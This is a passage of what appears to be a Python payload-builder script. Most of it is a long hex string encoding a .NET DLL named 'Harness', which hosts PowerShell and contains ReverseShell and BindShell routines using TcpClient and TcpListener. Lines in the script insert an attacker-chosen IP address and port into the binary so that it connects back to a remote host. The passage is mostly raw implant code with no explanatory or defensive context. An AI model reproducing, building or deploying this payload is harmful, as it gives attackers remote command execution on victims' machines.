0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006162636465666768696a6b6c6d6e6f707172737475767778797a0000000000004142434445464748494a4b4c4d4e4f505152535455565758595a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000102040800000000a4030000608279822100000000000000a6df000000000000a1a5000000000000819fe0fc00000000407e80fc00000000a8030000c1a3daa320000000000000000000000000000000000000000000000081fe00000000000040fe000000000000b5030000c1a3daa320000000000000000000000000000000000000000000000081fe00000000000041fe000000000000b6030000cfa2e4a21a00e5a2e8a25b000000000000000000000000000000000081fe000000000000407ea1fe000000005105000051da5eda20005fda6ada32000000000000000000000000000000000081d3d8dee0f90000317e81fe00000000108b0180010000000000000000000000c0ed0180010000000000000000000000c0ed01800100000001010000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000002000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000feffffff0000000000000000a89201800100000074ed01800100000074ed01800100000074ed01800100000074ed01800100000074ed01800100000074ed01800100000074ed01800100000074ed01800100000074ed0180010000007f7f7f7f7f7f7f7fac9201800100000078ed01800100000078ed01800100000078ed01800100000078ed01800100000078ed01800100000078ed01800100000078ed0180010000002e0000002e0000001092018001000000a023018001000000a225018001000000a4250180010000000004000001fcffff350000000b00000040000000ff030000800000
0081ffffff1800000008000000200000007f000000000000000000000000a00240000000000000000000c80540000000000000000000fa08400000000000000000409c0c40000000000000000050c30f40000000000000000024f412400000000000000080969816400000000000000020bcbe1940000000000004bfc91b8e3440000000a1edccce1bc2d34e4020f09eb5702ba8adc59d6940d05dfd25e51a8e4f19eb83407196d795430e058d29af9e40f9bfa044ed81128f8182b940bf3cd5a6cfff491f78c2d3406fc6e08ce980c947ba93a841bc856b5527398df770e07c42bcdd8edef99dfbeb7eaa5143a1e676e3ccf2292f84812644281017aaf8ae10e3c5c4fa44eba7d4f3f7ebe14a7a95cf4565ccc7910ea6aea019e3a3460d65170c7581867576c9484d5842e4a793393b35b8b2ed534da7e55d3dc55d3b8b9e925aff5da6f0a120c054a58c3761d1fd8b5a8bd8255d89f9db67aa95f8f327bfa2c85ddd806e4cc99b97208a025260c4257500000000cdcccdccccccccccccccfb3f713d0ad7a3703d0ad7a3f83f5a643bdf4f8d976e1283f53fc3d32c6519e25817b7d1f13fd00f2384471b47acc5a7ee3f40a6b6696caf05bd3786eb3f333dbc427ae5d594bfd6e73fc2fdfdce61841177ccabe43f2f4c5be14dc4be9495e6c93f92c4533b7544cd14be9aaf3fde67ba943945ad1eb1cf943f2423c6e2bcba3b31618b7a3f615559c17eb1537c12bb5f3fd7ee2f8d06be928515fb443f243fa5e939a527ea7fa82a3f7daca1e4bc647c46d0dd553e637b06cc23547783ff91813d91fa3a197a63254331c0ac3c2189d138824797b800fdd73bdc8858081bb1e8e386a6033bc684454207b6997537db2e3a33711cd223db32ee49905a39a687bec057daa582a6a2b532e268b211a7529f4459b7102c2549e42d36344f53aece6b258f5904a4c0dec27dfbe8c61e9ee7885a57913cbf508322184e4b6562fd838faf06947d11e42dde9fced2c804dda6d80a00000000feffffffffffffff0000000000000000000000000000f07f00000000000000004d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500006486020081eec3550000000000000000f00022200b020b00003e000000040000000000000000000000200000000000800100000000200000000200000400000000000000040000000000000000800000000200000000000003004085000040000000000000400000000000000000100000000000002000000000000000000000100000000000000000000000000000000000000000600000d802000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000004800000000000000000000002e74657874000000e43c000000200000003e000000020000000000000000000000000000200000602e72737263000000d8020000006000000004000000400000000000000000000000000000400000402e72656c6f63000000000000008000000000000000440000000000000000000000000000400000424800000002000500802f0000642d00000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003300300650000000000000002177d0300000402281000000a0000020273120000067d0600000402281100000a7d09000004027b09000004146f1200000a0002027b06000004027b09000004281300000a7d07000004027b07000004196f1400000a00027b070000046f1500000a00002a000000133001000c0000000100001100027b040000040a2b00062a260002037d040000042a0000133001000c0000000200001100027b050000040a2b00062a260002037d050000042a00001330010018000000030000110073010000060a066f070000060072010000700b2b00072a1b300400ef02000004000011001f5e0a72050000700b720f0000700c721b0000700d1613041613057223000070130772230000701308020228080000067d0200000402027b020000046f1600000a7d0100000402281700000a25130a7d08000004110a130b00386502000000027b010000046f1800000a16fe01130c110c3a4c02000000027b020000046f1900000a8d320000011306380202000000110416fe01130c110c2d5d00281a00000a11061611096f1b00000a6f1c00000a13081108068c3500000109281d00000a2
81e00000a16fe01130c110c2d1700021107280c0000060016130472230000701307002b0d0011071108281f00000a13070000384b010000110516fe01130c110c3a8b00000000281a00000a11061611096f1b00000a6f1c00000a130811086f2000000a08281e00000a16fe01130c110c2d4400021107280a00000616fe01130c110c2d0d00021107280c00000600002b1800027b060000046f2100000a72250000706f2200000a000072230000701307161305002b140011071108281f00000a130772230000701308000038b200000000281a00000a11061611096f1b00000a6f1c00000a130711076f2000000a727d000070281e00000a2d1611076f2000000a7287000070281e00000a16fe012b011600130c110c2d0538d700000011076f2000000a07281e00000a16fe01130c110c2d0c00171305722300007013070011077223000070282300000a2c0411052b011700130c110c2d28001107166f2400000a06fe0116fe01130c110c2d1200021107280b00000600722300007013070000001105130c110c2d4500021107280a00000616fe01130c110c2d1700021107280c0000060072230000701307161304002b1b00171304027b060000046f2100000a72910000706f2500000a00000000027b0100000411061611068e696f2600000a25130916fe0116fe01130c110c3adafdffff027b020000046f2700000a002b130002280200000616fe01130c110c3a89fdffff00de14110b14fe01130c110c2d08110b6f2800000a00dc002a00411c0000020000005900000080020000d90200001400000000000000"
raw_code += "".join(ip_hex) # ip
raw_code += "1b300300460000000500001100732900000a0a001a8d3200000125d019000004282b00000a0b07732c00000a0c060820"
raw_code += "".join(port_hex) # port
raw_code += "00006f2d00000a0000de0c0d0017282e00000a0000de00000613042b0011042a000001100000000007002a31000c3d0000011b3002004c00000006000011001a8d32000001130611060a06732c00000a0b0720401f0000732f00000a0c086f3000000a00140d00086f3100000a0d091305de1313040017282e00000a0000de00000913052b000011052a01100000000028000d35000d3d000001133002002b0000000700001100733200000a0a031200283300000a0b066f3400000a16fe0216fe010d092d0500160c2b04170c2b00082a001330040092000000080000110072230000700a0317036f3500000a17596f3600000a1001036f2000000a100103178d350000010c08161f209d086f3700000a0b07169a0d092c3a097299000070281e00000a2d0f0972b5000070281e00000a2d112b1e02177d0300000472d30000700a2b0f02167d0300000472fd0000700a2b00027b060000046f2100000a06722b010070281f00000a6f2500000a002a0000133004006e010000090000110003283800000a0d093a0d01000000027b08000004036f3900000a26027b0300000416fe010d092d1300027b0800000472310100706f3a00000a2600733b00000a0a0602fe060d000006733c00000a6f3d00000a00027b080000046f3e00000a6f3f00000a02fe060e000006733c00000a6f4000000a00027b080000046f3e00000a6f4100000a02fe060f000006733c00000a6f4200000a00027b080000046f3e00000a6f4300000a02fe0610000006733c00000a6f4400000a00027b080000046f3e00000a6f4500000a02fe0611000006733c00000a6f4600000a00027b080000046f4700000a6f4800000a166f4900000a18176f4a00000a00027b0800000414066f0100002b0b2b020000076f4c00000a16fe010d092df100027b080000046f4d00000a6f4e00000a6f4f00000a6f5000000a6f5100000a0c027b060000046f2100000a724701007008724f010070285200000a6f2500000a00027b080000046f4700000a6f5300000a002a00001b3002005b0000000a0000110003740200001b0a066f5400000a0b00076f5500000a0d2b20096f5600000a0c00027b060000046f2100000a086f5100000a6f2200000a0000096f5700000a130411042dd4de120914fe01130411042d07096f2800000a00dc002a00011000000200170030470012000000001b300300780000000b0000110000027b080000046f3e00000a6f3f00000a6f5800000a0b2b2a076f5900000a0a00027b060000046f2100000a066f5100000a722b010070281f00000a6f5a00000a0000076f5700000a0c082dccde100714fe010c082d07076f2800000a00dc00027b080000046f3e00000a6f3f00000a6f5b00000a002a011000000200180038500010000000001b300300780000000c0000110000027b080000046f3e00000a6f4100000a6f5c00000a0b2b2a076f5d00000a0a00027b060000046f2100000a066f5100000a722b010070281f00000a6f5e00000a0000076f5700000a0c082dccde100714fe010c082d07076f2800000a00dc00027b080000046f3e00000a6f4100000a6f5f00000a002a011000000200180038500010000000001b300300780000000d0000110000027b080000046f3e00000a6f4300000a6f6000000a0b2b2a076f6100000a0a00027b060000046f2100000a066f5100000a722b010070281f00000a6f6200000a0000076f5700000a0c082dccde100714fe010c082d07076f2800000a00dc00027b080000046f3e00000a6f4300000a6f6300000a002a011000000200180038500010000000001b300300780000000e0000110000027b080000046f3e00000a6f4500000a6f6400000a0b2b2a076f6500000a0a00027b060000046f2100000a066f5100000a722b010070281f00000a6f6600000a0000076f5700000a0c082dccde100714fe010c082d07076f2800000a00dc00027b080000046f3e00000a6f4500000a6f6700000a002a01100000020018003850001000000000a202286800000a7d0b00000402286900000a000002037d0a0000040203731e0000067d0c000004002a000000133001000c0000000f00001100027b0b0000040a2b00062a133001000b000000100000110072010000700a2b00062a00133002000d00000011000011001716736a00000a0a2b00062a000000133001000c0000001200001100027b0c0000040a2b00062a13300100100000001300001100286b00000a6f6c00000a0a2b00062a13300100100000001300001100286b00000a6f6d00000a0a2b00062a32007255010070736e00000a7a320072ce020070736e00000a7a12002b002a12002b002a7a00027b0a000004176f0300000600027b0a000004036f05000006002b002a7202734b0000067d0e00000402286f00000a000002037d0d000004002a13300400420000001400001100
027b0d0000047b010000046f7000000a16fe010b072d2900287100000a036f5100000a6f7200000a0a027b0d0000047b010000040616068e696f7300000a00002a3a00027245040070281f000006002a2a000203281f000006002a520002057245040070281f00000a281f000006002a2a000205281f000006002a2a000203281f000006002a520002724904007003281f00000a281f000006002a520002725904007003281f00000a281f000006002a520002726904007003281f00000a281f000006002a520002727d04007003281f00000a281f000006002a12002b002a133001000b000000100000110072010000700a2b00062a32007291040070736e00000a7a320072cf040070736e00000a7a3200721f050070736e00000a7a32007279050070736e00000a7a00133001000c0000001500001100027b0e0000040a2b00062a320072d3050070736e00000a7a3200720d060070736e00000a7a0000133001000c0000001600001100027b130000040a2b00062a260002037d130000042a0000133001000c0000001700001100027b160000040a2b00062a260002037d160000042a0000133001000c0000001800001100027b100000040a2b00062a260002037d100000042a0000133001000c0000000200001100027b110000040a2b00062a260002037d110000042a32007263060070736e00000a7a00133001000c0000001600001100027b120000040a2b00062a260002037d120000042a320072ad060070736e00000a7a320072f9060070736e00000a7a133001000c0000001700001100027b140000040a2b00062a133001000c0000001700001100027b150000040a2b00062a3200723b070070736e00000a7a32007273070070736e00000a7a320072c3070070736e00000a7a3200720f080070736e00000a7a133001000c0000001800001100027b170000040a2b00062a260002037d170000042a0000133001000c0000001700001100027b0f0000040a2b00062a260002037d0f0000042a0000133001000c0000001000001100027b180000040a2b00062a260002037d180000042a0000133003000201000019000011021200fe151900000112001f78287400000a0012001f64287500000a00067d0f000004021201fe151a000001120116287600000a00120116287700000a00077d1000000402177d11000004021f0f7d1200000402167d13000004021202fe1519000001120220ffffff7f287400000a00120220ffffff7f287500000a00087d14000004021203fe151900000112031f64287400000a0012031f64287500000a00097d15000004021204fe151900000112041f64287400000a00120420e8030000287500000a0011047d16000004021205fe151a000001120516287600000a00120516287700000a0011057d170000040272230000707d1800000402287800000a002a000042534a4201000100000000000c00000076342e302e33303331390000000005006c000000540e0000237e0000c00e0000ec10000023537472696e677300000000ac1f00005c0800002355530008280000100000002347554944000000182800004c05000023426c6f6200000000000000020000015715a229090a000000fa253300160000010000005800000006000000190000004b00000045000000780000000e0000001900000004000000150000001f0000000e000000010000000100000004000000030000000100000000000a00010000000000060073006c000a00b90097000a00c00097000a00d40097000e00fe00eb000e001301eb000a006b0144010a007f017a000a008d0144010a0028027a000600ae026c000600d7026c0006000703f2020600e7036c000a003a047a0006007d0462040a008a047a000600b20493040a00bf0497000a00d70497000a00f9047a000a0006057a000a0018057a000600650555050a00960597000a00a70597000a00030797000a000e0797000a00670797000a006f0797000600b7099d090600e209d0090600f909d0090600160ad0090600350ad00906004e0ad0090600670ad0090600820ad00906009d0ad0090600d50ab60a0600e90ab60a0600f70ad0090600100bd00906004d0b2d0b06006d0b2d0b0a00990b7a000a00c70b44010a00e60b44010600280c1e0c0600510c6c000600620c560c06007f0c6c0006008b0c6c000600ce0c6c000600270d2d0b0600560d2d0b0600650d6c0006006b0d6c000e00990d8e0d0600ab0d6c000600bc0d6c000e00c60deb000a00e80d7a000a00f50d7a001200b20493040a00fe0d7a000a00570e7a0006006a0e6c0012006a0e6c000a00870e7a000a00a10e7a000a00b70e7a000a00d10e7a000a00eb0e7a000a00010f7a000a00180f44010a002a0f44010a003b0f440112005e0f6c0006005e0f6c000a00940f44010a00bc0f7a000a00d40f7a0006001210620406004d103a101200121062040
6007b106a10060094106c0000000000010000000000010001000100100016001600050001000100030010001e00000009000a001200030010002b0000000d000d001e00030010004500000011000f00320000000000e20c0000050019004c0006000c01130001001d011700010024011b0001002b011b00010036011e0001003f01210001007401250001008a0129000100a1012d000100a6026a000100b3026e000100bb0272000100a6026a000100cb03ac0001009b0504010100b30508010100c3051e000100cf050c010100e0050c010100f10504010100080604010100170604010100230608010100330610011301420d1e005020000000008118a70131000100c420000000008608ad0135000100dc20000000008608bc0139000100e820000000008608cb013e0002000021000000008608d801420002000c21000000009600e501470003003021000000008100ee01310004004c24000000008100f2014c000400b024000000008100ff014c00040018250000000081000902510004005025000000008100110256000500f0250000000081001e02560006006c270000000081003b025b000700e4270000000081004e025b00090078280000000081005e025b000b000c2900000000810070025b000d00a02900000000810082025b000f00342a000000008618a70176001100602a00000000c608bf027c001200782a00000000c608ce0281001200902a00000000c608df0285001200ac2a00000000c608eb028a001200c42a00000000c60813038f001200e02a00000000c60826038f001200fc2a00000000c6003b0331001200092b00000000c6004d0331001200162b00000000c6005e03310012001b2b00000000c600750331001200202b00000000c6008a03420012003f2b000000008618a701760013005c2b000000008100d20356001400aa2b00000000c600dd0331001500b92b00000000c600dd0356001500c42b00000000c600dd03b0001600d92b00000000c600f403b0001900e42b00000000c600f40356001c00ef2b00000000c600fa0356001d00042c00000000c600090456001e00192c00000000c600180456001f002e2c00000000c600290456002000432c00000000c6004904b9002100482c0000000086085704810023005f2c00000000c600d004c00023006c2c00000000c600e904d2002600792c00000000c6002e05df002a00862c00000000c6002e05ec003000942c00000000c6084205f5003400ac2c00000000c6004c0581003400b92c00000000c6007205fa003400c82c00000000c608400613013400e02c00000000c608540618013400ec2c00000000c60868061e013500042d00000000c608770623013500102d00000000c608860629013600282d00000000c60899062e013600342d00000000c608ac063e0037004c2d00000000c608bb0642003700562d00000000c600ca0631003800642d00000000c608db06130138007c2d00000000c608ef0618013800862d00000000c600180734013900932d00000000c6082a0735003a00a02d00000000c6083b071e013a00b82d00000000c60855071e013a00d02d00000000c6007e0741013a00dd2d00000000c600860748013b00ea2d00000000c6009b0754013f00f72d00000000c6009b075c014100042e00000000c608ad07290143001c2e00000000c608c0072e014300282e00000000c608d3071e014400402e00000000c608e207230144004c2e00000000c608f10781004500642e00000000c608010856004500702e000000008618a7013100460000000100ad0800000100ad0800000100b30800000100b70800000100bc0800000100b70800000100c00800000200c70800000100c00800000200c70800000100c00800000200c70800000100c00800000200c70800000100c00800000200c70800000100a60200000100360100000100a60200000100c90800000100ad0800000100d00800000200e00800000300ad0800000100d00800000200e00800000300ad0800000100ad0800000100ad0800000100ad0800000100f00800000100f00800000100f80800000200010900000100080900000200f00800000300100900000100080900000200f008000003001d0900000400250900000100080900000200f008000003003309000004003c09000005004709000006005e0900000100080900000200f008000003003309000004003c0900000100ad0800000100ad0800000100ad0800000100ad0800000100ad08000001006609000001005e09000001007009000002007709000003008309000004008809000001006609000002008809000001008d0900000200940900000100ad0800000100ad0800000100ad08f900a70156000101a70156000901a70156001101a70156001901a70156002101a70156002901a70156003101a70156003901a70156004101a70139004901a70156005101
a70156005901a70156006101a70142006901a70131000900a701310049008b0b79014900ae0b7e017901d70b85013900f60b8e013900080c310031000d0ca3014100170ca80189012f0c350031003b0c3e0099016b0cad019901750cb301a101860c8100a101900cbb01a101970cc101a101900cc701a101a30c81001100eb028a001900dd035600a101ab0cc101a101b90ccd011900f40356008901c30cd2013100c80c3100b101da0c31003100a7013100b901a7013100c1017e0df201d901a701fc013100a30d0202e101b70d0a02f101a7010202f101d20d3100f101d80d4c000c00a70131000102060e3a020c000f0e3e00a101190e3e00a101240e6202a1012e0e6802a101340e78024100420e7d0241004c0e7d021400a70131001c00a70193021400790e99024100950ea4023102ad0eaa022400790e99023102c50ebe022c00790e99023102df0ed2023400790e99023102f70ee6023c00790e990241000b0ffa0259020b0f00034400320f0e0369024f0f140341006b0f1e038102770f35004100870f3a033900a60f3f038902cb0f45039102dd0f4b030900fb0f8100a101900c510359020410310014000a1067034c002010780354002e108a03a9025910350024002010a9035c002e108a031900090456002400041031002c002010a90364002e108a031900290456002c000410310034002010a9036c002e108a031900180456003400041031003c002010a90374002e108a031900fa0356003c00041031005900621013041100a70131006100a7012104b90282103104b90213038f00b90226038f00c102a70156001900a70131008901ac1035009901b910ad019901c2103c048901f4034204c900cb104200c900d5104200d100e0104200d100e61042002100a70131002e003300cd042e000b0073042e001300bb042e001b00cd042e002300cd042e002b00cd042e005300cd042e003b00d3042e004300cd042e006b0015052e007b002b052e005b00eb042e0073002205c3005301ed01950199019d01da010f021e024f026f0258038f03bc03d403ec03040418041d0427042c0437044a04500455045a045f04640402000100030003000400090005000b0000009202620000009d0266000000980394000000a30399000000d7029d000000a803a2000000ab03a7000000ba03a70000008905990000009005ff00000011086a01000021086f0100002c08740100003b086600000046086a01000056086200000063086f01000079086f01000087087401000096086f010000a1089900020002000300010003000300020004000500010005000500020013000700020014000900020015000b00020016000d00020017000f0002001800110002002a00130002002f001500020032001700010033001700010035001900020034001900020036001b00010037001b00020038001d00010039001d0002003b001f0001003c001f0002003e00210002003f002300020040002500010046002700020045002700010048002900020047002900020049002b0001004a002b00320283028b02b502c902dd02f102060371038203b303cb03e303fb034824000019000480000001000000000000000000000000001600000004000000000000000000000001006300000000000100000000000000000000000a007a000000000004000000000000000000000001006c00000000000200000000000000000000000100630000000000030002000400020005000200970033030000003c4d6f64756c653e004861726e6573732e646c6c004861726e65737300437573746f6d5053486f737400437573746f6d5053486f737455736572496e7465726661636500437573746f6d505352486f737452617755736572496e74657266616365006d73636f726c69620053797374656d004f626a6563740053797374656d2e4d616e6167656d656e742e4175746f6d6174696f6e0053797374656d2e4d616e6167656d656e742e4175746f6d6174696f6e2e486f7374005053486f7374005053486f737455736572496e74657266616365005053486f737452617755736572496e746572666163650053797374656d2e4e65742e536f636b657473004e6574776f726b53747265616d0073747265616d00546370436c69656e7400636c69656e7400464f524d41540073686f756c64457869740065786974436f646500686f73740053797374656d2e4d616e6167656d656e742e4175746f6d6174696f6e2e52756e7370616365730052756e7370616365006d7952756e537061636500506f7765725368656c6c00707300496e697469616c53657373696f6e5374617465007374617465002e63746f72006765745f53686f756c6445786974007365745f53686f756c6445786974006765745f45786974436f6465007365745f45786974436f646500496e766f6b6550530072756e00526576657273655368656c6
c0042696e645368656c6c00497356616c69640050726f636573734c6f63616c0050726f636573735053004461746141646465644576656e74417267730050534f75747075745f446174614164646564004572726f725f446174614164646564005761726e696e675f44617461416464656400566572626f73655f4461746141646465640044656275675f4461746141646465640053686f756c64457869740045786974436f64650070726f6772616d0047756964005f686f73744964005f7569006765745f496e7374616e63654964006765745f4e616d650056657273696f6e006765745f56657273696f6e006765745f55490053797374656d2e476c6f62616c697a6174696f6e0043756c74757265496e666f006765745f43757272656e7443756c74757265006765745f43757272656e74554943756c7475726500456e7465724e657374656450726f6d707400457869744e657374656450726f6d7074004e6f74696679426567696e4170706c69636174696f6e004e6f74696679456e644170706c69636174696f6e0053657453686f756c644578697400496e7374616e63654964004e616d650055490043757272656e7443756c747572650043757272656e74554943756c74757265005f72617755690053656e644f75747075740057726974654c696e6500436f6e736f6c65436f6c6f7200577269746500577269746544656275674c696e650057726974654572726f724c696e65005772697465566572626f73654c696e650057726974655761726e696e674c696e650050726f67726573735265636f726400577269746550726f6772657373006765745f4f75747075740053797374656d2e436f6c6c656374696f6e732e47656e657269630044696374696f6e61727960320050534f626a6563740053797374656d2e436f6c6c656374696f6e732e4f626a6563744d6f64656c00436f6c6c656374696f6e6031004669656c644465736372697074696f6e0050726f6d70740043686f6963654465736372697074696f6e0050726f6d7074466f7243686f69636500505343726564656e7469616c00505343726564656e7469616c547970657300505343726564656e7469616c55494f7074696f6e730050726f6d7074466f7243726564656e7469616c006765745f526177554900526561644c696e650053797374656d2e536563757269747900536563757265537472696e6700526561644c696e654173536563757265537472696e67004f75747075740052617755490053697a65005f77696e646f7753697a6500436f6f7264696e61746573005f637572736f72506f736974696f6e005f637572736f7253697a65005f666f726567726f756e64436f6c6f72005f6261636b67726f756e64436f6c6f72005f6d6178506879736963616c57696e646f7753697a65005f6d617857696e646f7753697a65005f62756666657253697a65005f77696e646f77506f736974696f6e005f77696e646f775469746c65006765745f4261636b67726f756e64436f6c6f72007365745f4261636b67726f756e64436f6c6f72006765745f42756666657253697a65007365745f42756666657253697a65006765745f437572736f72506f736974696f6e007365745f437572736f72506f736974696f6e006765745f437572736f7253697a65007365745f437572736f7253697a6500466c757368496e707574427566666572006765745f466f726567726f756e64436f6c6f72007365745f466f726567726f756e64436f6c6f720042756666657243656c6c0052656374616e676c6500476574427566666572436f6e74656e7473006765745f4b6579417661696c61626c65006765745f4d6178506879736963616c57696e646f7753697a65006765745f4d617857696e646f7753697a65004b6579496e666f00526561644b65794f7074696f6e7300526561644b6579005363726f6c6c427566666572436f6e74656e747300536574427566666572436f6e74656e7473006765745f57696e646f77506f736974696f6e007365745f57696e646f77506f736974696f6e006765745f57696e646f7753697a65007365745f57696e646f7753697a65006765745f57696e646f775469746c65007365745f57696e646f775469746c65004261636b67726f756e64436f6c6f720042756666657253697a6500437572736f72506f736974696f6e00437572736f7253697a6500466f726567726f756e64436f6c6f72004b6579417661696c61626c65004d6178506879736963616c57696e646f7753697a65004d617857696e646f7753697a650057696e646f77506f736974696f6e0057696e646f7753697a650057696e646f775469746c650076616c756500617267006461746100636d640073656e6465720065006f757470757400666f726567726f756e64436f6c6f72006261636b67726f756e64436f6c6f72
006d65737361676500736f757263654964007265636f72640063617074696f6e006465736372697074696f6e730063686f696365730064656661756c7443686f69636500757365724e616d65007461726765744e616d6500616c6c6f77656443726564656e7469616c5479706573006f7074696f6e730072656374616e676c6500736f757263650064657374696e6174696f6e00636c69700066696c6c006f726967696e00636f6e74656e74730053797374656d2e52756e74696d652e56657273696f6e696e67005461726765744672616d65776f726b4174747269627574650053797374656d2e5265666c656374696f6e00417373656d626c795469746c6541747472696275746500417373656d626c794465736372697074696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c79436f6d70616e7941747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7943756c747572654174747269627574650053797374656d2e52756e74696d652e496e7465726f70536572766963657300436f6d56697369626c65417474726962757465004775696441747472696275746500417373656d626c7956657273696f6e41747472696275746500417373656d626c7946696c6556657273696f6e4174747269627574650053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300436f6d70696c6174696f6e52656c61786174696f6e734174747269627574650052756e74696d65436f6d7061746962696c6974794174747269627574650043726561746544656661756c7400417574686f72697a6174696f6e4d616e61676572007365745f417574686f72697a6174696f6e4d616e616765720052756e7370616365466163746f72790043726561746552756e73706163650050535468726561644f7074696f6e73007365745f5468726561644f7074696f6e73004f70656e0047657453747265616d004372656174650053797374656d2e494f0053747265616d006765745f43616e52656164006765745f5265636569766542756666657253697a6500427974650053797374656d2e5465787400456e636f64696e67006765745f415343494900476574537472696e6700537472696e67005472696d004368617200436f6e636174006f705f457175616c69747900546f4c6f776572006f705f496e657175616c697479006765745f4368617273005265616400436c6f73650049446973706f7361626c6500446973706f7365003c50726976617465496d706c656d656e746174696f6e44657461696c733e7b39424146384645382d364143442d343139312d423545392d4631323344323531313734347d00436f6d70696c657247656e6572617465644174747269627574650024246d6574686f643078363030303030382d310052756e74696d6548656c706572730041727261790052756e74696d654669656c6448616e646c6500496e697469616c697a6541727261790053797374656d2e4e65740049504164647265737300436f6e6e65637400456e7669726f6e6d656e74004578697400457863657074696f6e005463704c697374656e657200537461727400416363657074546370436c69656e7400505350617273654572726f72005053506172736572005053546f6b656e00546f6b656e697a65006765745f436f756e74006765745f4c656e67746800537562737472696e670053706c69740049734e756c6c4f72456d7074790041646453637269707400416464436f6d6d616e6400505344617461436f6c6c656374696f6e6031004576656e7448616e646c65726031006164645f4461746141646465640050534461746153747265616d73006765745f53747265616d73004572726f725265636f7264006765745f4572726f72005761726e696e675265636f7264006765745f5761726e696e6700566572626f73655265636f7264006765745f566572626f73650044656275675265636f7264006765745f4465627567005053436f6d6d616e64006765745f436f6d6d616e647300436f6d6d616e64436f6c6c656374696f6e00436f6d6d616e64006765745f4974656d00506970656c696e65526573756c745479706573004d657267654d79526573756c747300494173796e63526573756c7400426567696e496e766f6b65006765745f4973436f6d706c65746564006765745f52756e73706163650053657373696f6e537461746550726f7879006765745f53657373696f6e537461746550726f78790050617468496e7472696e73696373006765745f506174680050617468496e666f006765745
f43757272656e7446696c6553797374656d4c6f636174696f6e00546f537472696e6700436c6561720052656164416c6c0049456e756d657261746f72603100476574456e756d657261746f72006765745f43757272656e740053797374656d2e436f6c6c656374696f6e730049456e756d657261746f72004d6f76654e657874004e6577477569640053797374656d2e546872656164696e6700546872656164006765745f43757272656e74546872656164004e6f74496d706c656d656e746564457863657074696f6e006765745f43616e5772697465006765745f55544638004765744279746573007365745f5769647468007365745f486569676874007365745f58007365745f59000003200000093c00720066003e00000b3c002f00720066003e00000765006e006400000100575b0021005d0020005400720061006e00730066006500720020006500720072006f0072007300200066006f0075006e0064002e002000540072007900200069006d0070006f0072007400200061006700610069006e00000965007800690074000009710075006900740000073e003e002000001b65006e00610062006c0065002d0066006f0072006d0061007400011d640069007300610062006c0065002d0066006f0072006d006100740001295b002b005d00200046006f0072006d0061007400740069006e006700200061006400640065006400002d5b002d005d00200046006f0072006d0061007400740069006e0067002000720065006d006f0076006500640001050d000a0000154f00750074002d0053007400720069006e006700010750005300200000053e00200000817745006e007400650072004e0065007300740065006400500072006f006d007000740020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e002000200054006800650020007300630072006900700074002000690073002000610073006b0069006e006700200066006f007200200069006e007000750074002c00200077006800690063006800200069007300200061002000700072006f0062006c0065006d002000730069006e00630065002000740068006500720065002700730020006e006f00200063006f006e0073006f006c0065002e00200020004d0061006b00650020007300750072006500200074006800650020007300630072006900700074002000630061006e0020006500780065006300750074006500200077006900740068006f00750074002000700072006f006d007000740069006e006700200074006800650020007500730065007200200066006f007200200069006e007000750074002e0001817545007800690074004e0065007300740065006400500072006f006d007000740020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e002000200054006800650020007300630072006900700074002000690073002000610073006b0069006e006700200066006f007200200069006e007000750074002c00200077006800690063006800200069007300200061002000700072006f0062006c0065006d002000730069006e00630065002000740068006500720065002700730020006e006f00200063006f006e0073006f006c0065002e00200020004d0061006b00650020007300750072006500200074006800650020007300630072006900700074002000630061006e0020006500780065006300750074006500200077006900740068006f00750074002000700072006f006d007000740069006e006700200074006800650020007500730065007200200066006f007200200069006e007000750074002e0001030a00000f440045004200550047003a002000000f4500520052004f0052003a002000001356004500520042004f00530045003a00200000135700410052004e0049004e0047003a002000003d500072006f006d007000740020006900730020006e006f007400200069006d0070006c0065006d0065006e0074006500640020007900650074002e00004f500072006f006d007000740046006f007200430068006f0069006300650020006900730020006e006f007400200069006d0070006c0065006d0065006e0074006500640020007900650074002e000059500072006f006d007000740046006f007200430072006500640065006e007400690061006c00310020006900730020006e006f007400200069006d0070006c0065006d0065006e0074006500640020007900650074002e000059500072006f006d007000740046006f007200430072006500640065006e007400690061006c00320020006900730020006e006f007400200069006d0070006c0065006d0065006e0074006500640020007900650074002e00003952006500610064004c0069006e0065002000
